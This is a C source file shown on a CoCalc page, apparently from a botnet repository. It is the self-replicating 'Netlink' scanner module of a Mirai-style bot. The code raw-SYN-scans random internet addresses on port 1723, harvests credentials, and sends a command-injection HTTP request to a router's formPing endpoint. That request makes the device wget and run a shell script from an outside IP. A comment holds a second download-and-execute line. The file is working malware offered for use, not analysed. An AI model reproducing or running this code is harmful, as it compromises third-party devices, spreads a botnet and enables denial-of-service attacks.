CoCalc -- netlink.c

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Self Reps/Netlink/netlink.c
⁵⁰³⁸ views
1
#ifdef SELFREP
2

3
#define _GNU_SOURCE
4

5
#ifdef DEBUG
6
    #include <stdio.h>
7
#endif
8
#include <unistd.h>
9
#include <stdlib.h>
10
#include <sys/socket.h>
11
#include <arpa/inet.h>
12
#include <sys/select.h>
13
#include <sys/types.h>
14
#include <time.h>
15
#include <fcntl.h>
16
#include <signal.h>
17
#include <errno.h>
18
#include <string.h>
19
#include <linux/ip.h>
20
#include <linux/tcp.h>
21

22
#include "includes.h"
23
#include "netlink.h"
24
#include "table.h"
25
#include "rand.h"
26
#include "util.h"
27
#include "checksum.h"
28

29
int netlink_scanner_pid = 0, netlink_rsck = 0, netlink_rsck_out = 0, netlink_auth_table_len = 0;
30
char netlink_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
31
struct netlink_scanner_auth *netlink_auth_table = NULL;
32
struct netlink_scanner_connection *conn_table;
33
uint16_t netlink_netlink_auth_table_max_weight = 0;
34
uint32_t netlink_fake_time = 0;
35
int netlink_range[] = {181,178,62,213,178,170,181,101,119};
36

37
int netlink_recv_strip_null(int sock, void *buf, int len, int flags)
38
{
39
    int ret = recv(sock, buf, len, flags);
40

41
    if(ret > 0)
42
    {
43
        int i = 0;
44

45
        for(i = 0; i < ret; i++)
46
        {
47
            if(((char *)buf)[i] == 0x00)
48
            {
49
                ((char *)buf)[i] = 'A';
50
            }
51
        }
52
    }
53

54
    return ret;
55
}
56

57
void netlink_scanner(void)
58
{
59
    int i = 0, x;
60
    uint16_t source_port;
61
    struct iphdr *iph;
62
    struct tcphdr *tcph;
63

64
    
65
    netlink_scanner_pid = fork();
66
    if(netlink_scanner_pid > 0 || netlink_scanner_pid == -1)
67
        return;
68

69
    LOCAL_ADDR = util_local_addr();
70

71
    rand_init();
72
    netlink_fake_time = time(NULL);
73
    conn_table = calloc(netlink_SCANNER_MAX_CONNS, sizeof(struct netlink_scanner_connection));
74
    for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)
75
    {
76
        conn_table[i].state = netlink_SC_CLOSED;
77
        conn_table[i].fd = -1;
78
        conn_table[i].credential_index = 0;
79
    }
80

81
    // Set up raw socket scanning and payload
82
    if((netlink_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
83
    {
84
        #ifdef DEBUG
85
            printf("[Netlink] failed to initialize raw socket, cannot scan\n");
86
        #endif
87
        exit(0);
88
    }
89
    fcntl(netlink_rsck, F_SETFL, O_NONBLOCK | fcntl(netlink_rsck, F_GETFL, 0));
90
    i = 1;
91
    if(setsockopt(netlink_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
92
    {
93
        #ifdef DEBUG
94
            printf("[Netlink] failed to set IP_HDRINCL, cannot scan\n");
95
        #endif
96
        close(netlink_rsck);
97
        exit(0);
98
    }
99

100
    do
101
    {
102
        source_port = rand_next() & 0xffff;
103
    }
104
    while(ntohs(source_port) < 1024);
105

106
    iph = (struct iphdr *)netlink_scanner_rawpkt;
107
    tcph = (struct tcphdr *)(iph + 1);
108

109
    // Set up IPv4 header
110
    iph->ihl = 5;
111
    iph->version = 4;
112
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
113
    iph->id = rand_next();
114
    iph->ttl = 64;
115
    iph->protocol = IPPROTO_TCP;
116

117
    // Set up TCP header
118
    tcph->dest = htons(1723);
119
    tcph->source = source_port;
120
    tcph->doff = 5;
121
    tcph->window = rand_next() & 0xffff;
122
    tcph->syn = TRUE;
123

124
    #ifdef DEBUG
125
        printf("[Netlink] scanner process initialized. scanning started.\n");
126
    #endif
127

128
    // Main logic loop
129
    while(TRUE)
130
    {
131
        fd_set fdset_rd, fdset_wr;
132
        struct netlink_scanner_connection *conn;
133
        struct timeval tim;
134
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
135

136
        // Spew out SYN to try and get a response
137
        if(netlink_fake_time != last_spew)
138
        {
139
            last_spew = netlink_fake_time;
140

141
            for(i = 0; i < netlink_SCANNER_RAW_PPS; i++)
142
            {
143
                struct sockaddr_in paddr = {0};
144
                struct iphdr *iph = (struct iphdr *)netlink_scanner_rawpkt;
145
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
146

147
                iph->id = rand_next();
148
                iph->saddr = LOCAL_ADDR;
149
                iph->daddr = get_random_netlink_ip();
150
                iph->check = 0;
151
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
152

153
                tcph->dest = htons(1723);
154
                tcph->seq = iph->daddr;
155
                tcph->check = 0;
156
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
157

158
                paddr.sin_family = AF_INET;
159
                paddr.sin_addr.s_addr = iph->daddr;
160
                paddr.sin_port = tcph->dest;
161

162
                sendto(netlink_rsck, netlink_scanner_rawpkt, sizeof(netlink_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
163
            }
164
        }
165

166
        // Read packets from raw socket to get SYN+ACKs
167
        last_avail_conn = 0;
168
        while(TRUE)
169
        {
170
            int n = 0;
171
            char dgram[1514];
172
            struct iphdr *iph = (struct iphdr *)dgram;
173
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
174
            struct netlink_scanner_connection *conn;
175

176
            errno = 0;
177
            n = recvfrom(netlink_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
178
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
179
                break;
180

181
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
182
                continue;
183
            if(iph->daddr != LOCAL_ADDR)
184
                continue;
185
            if(iph->protocol != IPPROTO_TCP)
186
                continue;
187
            if(tcph->source != htons(1723))
188
                continue;
189
            if(tcph->dest != source_port)
190
                continue;
191
            if(!tcph->syn)
192
                continue;
193
            if(!tcph->ack)
194
                continue;
195
            if(tcph->rst)
196
                continue;
197
            if(tcph->fin)
198
                continue;
199
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
200
                continue;
201

202
            conn = NULL;
203
            for(n = last_avail_conn; n < netlink_SCANNER_MAX_CONNS; n++)
204
            {
205
                if(conn_table[n].state == netlink_SC_CLOSED)
206
                {
207
                    conn = &conn_table[n];
208
                    last_avail_conn = n;
209
                    break;
210
                }
211
            }
212

213
            // greets to anyone seeing this new private selfrep by w00dy :p
214
            if(conn == NULL)
215
                break;
216

217
            conn->dst_addr = iph->saddr;
218
            conn->dst_port = tcph->source;
219
            netlink_setup_connection(conn);
220
        }
221

222
        FD_ZERO(&fdset_rd);
223
        FD_ZERO(&fdset_wr);
224

225
        for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)
226
        {
227
            int timeout = 5;
228

229
            conn = &conn_table[i];
230
            //timeout = (conn->state > netlink_netlink_SC_CONNECTING ? 30 : 5);
231

232
            if(conn->state != netlink_SC_CLOSED && (netlink_fake_time - conn->last_recv) > timeout)
233
            {
234
                #ifdef DEBUG
235
                    printf("[Netlink] FD%d timed out (state = %d)\n", conn->fd, conn->state);
236
                #endif
237

238
                close(conn->fd);
239
                conn->fd = -1;
240
                conn->state = netlink_SC_CLOSED;
241
                free(conn->credentials);
242
                conn->credential_index = 0;
243
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));
244

245
                continue;
246
            }
247

248
            if(conn->state == netlink_netlink_SC_CONNECTING || conn->state == netlink_SC_EXPLOIT_STAGE2 || conn->state == netlink_SC_EXPLOIT_STAGE3)
249
            {
250
                FD_SET(conn->fd, &fdset_wr);
251
                if(conn->fd > mfd_wr)
252
                    mfd_wr = conn->fd;
253
            }
254
            else if(conn->state != netlink_SC_CLOSED)
255
            {
256
                FD_SET(conn->fd, &fdset_rd);
257
                if(conn->fd > mfd_rd)
258
                    mfd_rd = conn->fd;
259
            }
260
        }
261

262
        tim.tv_usec = 0;
263
        tim.tv_sec = 1;
264
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
265
        netlink_fake_time = time(NULL);
266

267
        for(i = 0; i < netlink_SCANNER_MAX_CONNS; i++)
268
        {
269
            conn = &conn_table[i];
270

271
            if(conn->fd == -1)
272
                continue;
273

274
            if(FD_ISSET(conn->fd, &fdset_wr))
275
            {
276
                int err = 0, ret = 0;
277
                socklen_t err_len = sizeof(err);
278

279
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
280
                if(err == 0 && ret == 0)
281
                {
282

283
                    if(conn->state == netlink_SC_EXPLOIT_STAGE2)
284
                    {
285
                        #ifdef DEBUG
286
                            printf("[Netlink] FD%d request sent to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
287
                        #endif
288

289
                        // build stage 2 payload  might needa change this payload format     cd /tmp; wget http://15.235.163.157/bins/666.mips; chmod 777 666.mips; ./666.mips NetLink.Rep
290
                        util_strcpy(conn->payload_buf, "GET /boaform/admin/formPing?target_addr=;wget%20http://20.90.115.58/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\n\r\n");
291

292
                        // actually send the payload
293
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
294

295
                        // clear the payload buffer
296
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));
297

298
                        // clear the socket buffer
299
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
300

301
						conn->state = netlink_SC_CLOSED;
302
                        close(conn->fd);
303
                        conn->fd = -1;
304

305
                        continue;
306
                    }
307
                    else if(conn->state == netlink_SC_EXPLOIT_STAGE3)
308
                    {
309
                        conn->state = netlink_SC_CLOSED;
310

311
                        continue;
312
                    }
313
                    else
314
                    {
315
                        conn->credentials = malloc(256);
316
                        conn->state = netlink_SC_EXPLOIT_STAGE2;
317
                    }
318
                }
319
                else
320
                {
321
                    #ifdef DEBUG
322
                        printf("[Netlink] FD%d error while connecting = %d\n", conn->fd, err);
323
                    #endif
324

325
                    close(conn->fd);
326
                    conn->fd = -1;
327
                    conn->state = netlink_SC_CLOSED;
328

329
                    continue;
330
                }
331
            }
332

333
            if(FD_ISSET(conn->fd, &fdset_rd))
334
            {
335
                while(TRUE)
336
                {
337
                    int ret = 0;
338

339
                    if(conn->state == netlink_SC_CLOSED)
340
                        break;
341
						close(conn->fd);
342

343
                    if(conn->rdbuf_pos == netlink_SCANNER_RDBUF_SIZE)
344
                    {
345
                        memmove(conn->rdbuf, conn->rdbuf + netlink_SCANNER_HACK_DRAIN, netlink_SCANNER_RDBUF_SIZE - netlink_SCANNER_HACK_DRAIN);
346
                        conn->rdbuf_pos -= netlink_SCANNER_HACK_DRAIN;
347
                    }
348

349
                    errno = 0;
350
                    ret = netlink_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, netlink_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
351
                    if(ret == 0)
352
                    {
353
                        #ifdef DEBUG
354
                            printf("[Netlink] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);
355
                        #endif
356
                        errno = ECONNRESET;
357
                        ret = -1;
358
                    }
359
                    if(ret == -1)
360
                    {
361
                        if(errno != EAGAIN && errno != EWOULDBLOCK)
362
                        {
363
                            if(conn->state == netlink_SC_EXPLOIT_STAGE2)
364
                            {
365
                                #ifdef DEBUG
366
                                    printf("[Netlink] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);
367
                                #endif
368
                                close(conn->fd);
369
                                netlink_setup_connection(conn);
370
                                continue;
371
                            }
372

373
                            close(conn->fd);
374
                            conn->fd = -1;
375
                            conn->state = netlink_SC_CLOSED;
376
                            free(conn->credentials);
377
                            conn->credential_index = 0;
378
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));
379
                        }
380
                        break;
381
                    }
382

383
                    conn->rdbuf_pos += ret;
384
                    conn->last_recv = netlink_fake_time;
385

386
                    int len = util_strlen(conn->rdbuf);
387
                    conn->rdbuf[len] = 0;
388

389
                    if(conn->state == netlink_SC_GET_CREDENTIALS)
390
                    {
391
                        char *out = strtok(conn->rdbuf, " ");
392

393
                        while(out != NULL)
394
                        {
395
                            if(strstr(out, ""))
396
                            {
397
                                #ifdef DEBUG
398
                                    printf("[Netlink] FD%d parsing credentials...\n", conn->fd);
399
                                #endif
400

401
                                memmove(out, out + 11, strlen(out));
402

403
                                int i = 0;
404

405
                                for(i = 0; i < strlen(out); i++)
406
                                {
407
                                    if(out[i] == ';' || out[i] == '"' || out[i] == ' ')
408
                                        out[i] = 0;
409
                                }
410

411
                                conn->credentials[conn->credential_index] = strdup(out);
412
                                conn->credential_index++;
413

414
                            }
415

416
                            out = strtok(NULL, " ");
417
                        }
418
                    }
419

420
                    if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)
421
                    {
422
                        #ifdef DEBUG
423
                            printf("[Netlink] FD%d failed to retrieve credentials\n", conn->fd);
424
                        #endif
425
                        close(conn->fd);
426
                        conn->fd = -1;
427
                        conn->state = netlink_SC_CLOSED;
428
                        free(conn->credentials);
429
                        conn->credential_index = 0;
430
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
431
                    }
432
                    else
433
                    {
434
                        #ifdef DEBUG
435
                            printf("[Netlink] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);
436
                        #endif
437

438
                        close(conn->fd);
439
                        conn->fd = -1;
440
                        conn->state = netlink_SC_EXPLOIT_STAGE2;
441
                        conn->credential_index = 0;
442
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
443
                    }
444
                }
445
            }
446
        }
447
    }
448
}
449

450
void netlink_kill(void)
451
{
452
    kill(netlink_scanner_pid, 9);
453
}
454

455
static void netlink_setup_connection(struct netlink_scanner_connection *conn)
456
{
457
    struct sockaddr_in addr = {0};
458

459
    if(conn->fd != -1)
460
        close(conn->fd);
461

462
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
463
    {
464
        #ifdef DEBUG
465
            printf("[Netlink] failed to call socket()\n");
466
        #endif
467
        return;
468
    }
469

470
    conn->rdbuf_pos = 0;
471
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));
472

473
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
474

475
    addr.sin_family = AF_INET;
476
    addr.sin_addr.s_addr = conn->dst_addr;
477
    addr.sin_port = conn->dst_port;
478

479
    conn->last_recv = netlink_fake_time;
480

481
    if(conn->state == netlink_SC_EXPLOIT_STAGE2 || conn->state == netlink_SC_EXPLOIT_STAGE3)
482
    {
483
    }
484
    else
485
    {
486
        conn->state = netlink_netlink_SC_CONNECTING;
487
    }
488

489
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
490
}
491

492
static ipv4_t get_random_netlink_ip(void)
493
{
494
    uint32_t tmp;
495
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
496

497
    do
498
    {//netlink_range
499
        tmp = rand_next();
500
        srand(time(NULL));
501

502
        int dcock = rand() % (sizeof(netlink_range)/sizeof(char *));
503

504
        o1 = netlink_range[dcock];
505
        o2 = (tmp >> 8) & 0xff;
506
        o3 = (tmp >> 16) & 0xff;
507
        o4 = (tmp >> 24) & 0xff;
508
    }
509
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback
510
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
511
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
512
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
513
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
514
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
515
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
516
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
517
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
518
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
519
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
520
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
521
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
522
    );
523

524
    return INET_ADDR(o1,o2,o3,o4);
525
}
526

527
#endif
528

529

530
Product

Resources

Company
